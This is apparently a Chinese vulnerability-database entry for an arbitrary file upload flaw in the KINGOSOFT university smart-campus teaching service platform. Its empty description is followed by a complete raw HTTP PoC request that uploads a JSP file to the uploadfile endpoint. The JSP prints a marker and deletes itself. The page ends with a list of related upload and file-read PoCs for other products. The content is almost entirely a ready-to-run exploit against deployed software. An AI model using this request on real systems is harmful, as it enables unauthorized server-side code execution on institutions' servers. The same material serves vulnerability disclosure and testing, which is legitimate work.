KINGOSOFT高校智慧校园教学综合服务平台 uploadfile 任意文件上传漏洞

漏洞描述

PoC代码

POST /kyfw/frame/sbxm.sbxm.uploadfile.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 321
Content-Type: multipart/form-data; boundary=e95c51e127eb198c34bb6d95dbc26f30

--e95c51e127eb198c34bb6d95dbc26f30
Content-Disposition: form-data; name="file"; filename="2147e4b8f9.jsp"
Content-Type: application/octet-stream

<% out.println("6fc7d58f94ab46376a24ac1203a9d10c");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
--e95c51e127eb198c34bb6d95dbc26f30--

相关漏洞推荐

• KINGOSOFT高校智慧校园教学综合服务平台 /jw/lessonchangeapply/jwComFileDownload.action 文件读取漏洞
• POC KINGOSOFT高校智慧校园教学综合服务平台 downloadzgkssmwd 任意文件读取漏洞
• 因酷教育软件开源网校程序uploadfile任意文件上传漏洞
• 百卓Smart uploadfile存在任意文件上传漏洞
• showdoc-uploadfile: Showdoc Uploadfile
• glodon-oa-msgbroadcastuploadfile-uploadfile: 广联达oa 后台文件上传漏洞 (需登录)
• POC enjoyscm-uploadfile: enjoyscm UploadFile任意文件上传
• POC esafenet-uploadfilefromclientserviceforclient-fileupload: 亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传
• POC h5-yun-commodtiy-uploadfile: H5 云商城 file.php 文件上传
• POC jeespringcloud-uploadfile-fileupload: JeeSpringCloud uploadFile.jsp 任意文件上传
• POC jinher-uploadfileblock-fileupload: 金和OA UploadFileBlock接口任意文件上传
• POC kingdee-eas-myuploadfile-fileupload: 金蝶EAS myUploadFile接口任意文件上传
• POC livebos-uploadfile-do-fileupload: LiveBOS UploadFile.do 任意文件上传漏洞(XVE-2023-21708)